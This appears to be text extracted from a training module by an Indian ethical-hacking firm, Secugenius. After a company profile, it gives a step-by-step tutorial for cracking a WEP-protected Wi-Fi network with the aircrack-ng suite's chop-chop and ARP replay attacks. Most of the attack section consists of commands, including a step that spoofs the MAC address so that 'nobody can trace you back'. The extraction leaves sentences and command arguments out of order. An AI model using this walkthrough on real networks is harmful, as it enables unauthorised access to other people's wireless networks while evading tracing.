The main activities of Secugenius Security Solutions are providing training in Information Security and various professional courses. graduates and professionals in various fields. . We at SECUGENIUS are headquartered at Ludhiana. Secugenius Security Solutions is an organization which believes in inventing and implementing new ideas to influence the technological minds of the youngsters Looking at the number of Cyber Crimes since last many years. All the modules have been designed in order to provide students with specialized knowledge by specialized trainers. Secugenius Security Solutions. LTD) Company Profile: Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We believe in making the base of students to be as strong as possible. Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the benefit of the students & making them aware of the latest trends in technological era of the Computer age. In the workshops conducted by Secugenius. This Online Digital Library has been initiated as a free resource & permanent resource on specialization basis for every student of Team Secugenius. Education is delivered to students through two modes i. IT Professionals. managed and funded by the Founders and Directors of Secugenius Er. Chetan Soni . Bank Employees. Security Specialist. Harpreet Khattar & Er. Kshitij Adhlakha . Regular mode and Distance mode which are available as short term and long term courses. We at Secugenius Security Solutions provides training on Ethical hacking & Cyber Security to students. This library was furnished. The overall resource person for the content of the series of this Digital Library is Er. the Manchester of Punjab. We believe in spreading knowledge to all the youngsters & growing minds of the nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime Investigation & Forensic Sciences Secugenius provides various security solutions to its clients by securing their websites from cyber attacks.SECUGENIUS SECURITY SOLUTIONS -------------------------------------------------------------------------------------- (A UNIT OF HARKSH TECHNOLOGIES PVT. participants can claim to be trained by the highly experienced & skilled corporate trainers from different parts of the nation. We provide training to college students. Police officials.e.Sr.

seculabs. .com.secugenius. Punjab – India support@secugenius. www.Wi-Fi WEP Cracking using Chop-Chop Method Product ID No: SG/ODL/13028 Founder & Director: Harpreet Khattar & Kshitij Adhlakha Resource Person: Chetan Soni & Loveleen Arora Secugenius Security Solutions SCO-13A. Near Krishna Mandir. Model Town . info@secugenius.

But what if clients are not there…??? No packets are being captured…??? So in that case Deauth does not work. Some Basic Commands which is very helpful when you use Backtrack.  iwconfig  ifconfig  pwd  ls  startx  Username – root and Password – toor (By Default in BT5) . then we capture the reply packets and crack WEP.In previous WEP cracking method. we use to send the Deauthentication packets to the client’s connected to the victim’s AP (Access Point). Solution to this is “CHOP-CHOP METHOD” Requirements for CHOP-CHOP Method:         MAC address of Your System BSSID ESSID Channel ID Wireless Interface Windows 2000/Xp/Seven/Vista/8/Linux Distro Backtrack Linux Operating System (Live or ISO) VMware Workstation (If you use an ISO File) Wireless USB Adaptor (If you use VMware Workstation) Our System Configuration Details:      MAC Address BSSID ESSID Channel ID Wireless Interface Security = = = = = = 00:11:22:33:44:55 80:1F:02:02:6C:C4 Chetansoni 11 wlan0 WEP (64-Bit Encryption) First Start Backtrack Linux Operating system inside VMware Workstation named as BT-5-R3 Version.

11bgn ESSID:off/any Mode:Managed Access Point: Not Associated Tx-power=20 Dbm Retry long limit:7 RTS thr:off Fragment thr:off Encryption Key:off Power Management:off . root@bt:~# iwconfig Wlan0 IEEE 802.Step 1 — Start Terminal and type this command for checking your wireless device.

root@bt:~# airmon-ng start wlan0 .Step 2 – Start the wireless interface in monitor mode by using this command.

Step 3 – Observe the wireless connections within range and copy the BSSID and channel number of your victim’s AP (Access Point) root@bt:~# airodump-ng mon0 Here’s Our Target = Chetansoni (Bssid – 80:1F:02:02:6C:C4 with Channel – 11) .

Step 4 – Further. root@bt:~# airodump-ng 80:1F:02:02:6C:C4 mon0 Where. we use airodump-ng with some options to view the details of the victim’s AP. -c = Channel ID -w = Writing captured data --bssid = MAC Address of AP (Your Target) mon0 = Monitor Mode –c 11 –w Chetansoni --bssid .

make it up. For doing that. first make your wireless device down and after changing MAC. root@bt:~# ifconfig wlan0 down root@bt:~# macchanger --mac 00:11:22:33:44:55 wlan0 root@bt:~# ifconfig wlan0 up .Step 5 – Now Change your MAC address so that nobody can trace you back.

The lack of association with the access point is the single biggest reason why injection fails. use fake authentication: root@bt:~# aireplay-ng -1 0 -e Chetansoni -a 80:1F:02:02:6C:C4 -h 00:11:22:33:44:55 mon0 Where.Step 6 – Use aireplay-ng to do a fake authentication with the access point. To associate with an access point. In order for an access point to accept a packet. the source MAC address must already be associated. In this state. no new IVs are created because the AP is ignoring all the injected packets. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “Deauthentication” packet. -1 0 -e Chetansoni -a 80:1F:02:02:6C:C4 -h 00:11:22:33:44:55 mon0 = Fake Authentication = Reassociation (In seconds) = Wireless network name = Access point MAC address = our card MAC address = wireless interface name .

Step 7 – Use aireplay-ng chopchop or ARP replay attack root@bt:~# aireplay-ng 80:1F:02:02:6C:C4 mon0 -4 -h -b -4 -h 00:11:22:33:44:55 -b = Arp Replay attack of Aireplay-ng = MAC Address of your wireless Device = Bssid or MAC of AP .

xor” . I’ll capture ARP replay packets and after its completion. it will create a XOR file named as “replay_dec-1215134729.Step 8 – Whenever you type ―y‖ in the last step.

255) -y replay_dec-1215-134729. -l 255.255 –y replay_dec-1215134729.255 = Dest.255. -0 = It generates ARP packet -a 80:1F:02:02:6C:C4 = Access point MAC address -k 255.255 = Source IP (most APs respond to 255.255.Step 9 – Use packetforge-ng to make the XOR file usable for cracking into aircrack-ng root@bt:~# packetforge-ng -0 –a 80:1F:02:02:6C:C4 –k 255.xor = to read the PRGA -w arp-request = Name of file to write the ARP packet . IP (most APs respond to 255.255.255 –l 255.xor –w arp-request Where.

-2 =Use interactive frame selection -h = Fake MAC -r arp-request = Defines the file name from which to read the Arp packet mon0 = Defines the monitor mode Use this Packet – ―Y‖ .Step 10 – Inject the ARP packet by using this following command: root@bt:~# aireplay-ng -2 –h 80:1F:02:02:6C:C4 –r arp-request mon0 Where.

g.128.cap -n -e -b Cap = Number of WEP bits key Applied e.256 bit = Victim’s ESSID = Victim’s BSSID = capture file which we mentioned in airodump command.Step 11 – Run aircrack-ng to obtain the WEP key root@bt:~# aircrack-ng –n 64 –z –f 1 –e Chetansoni –b 80:1F:02:02:6C:C4 Chetansoni-01. . 64.

Sign up to vote on this title
UsefulNot useful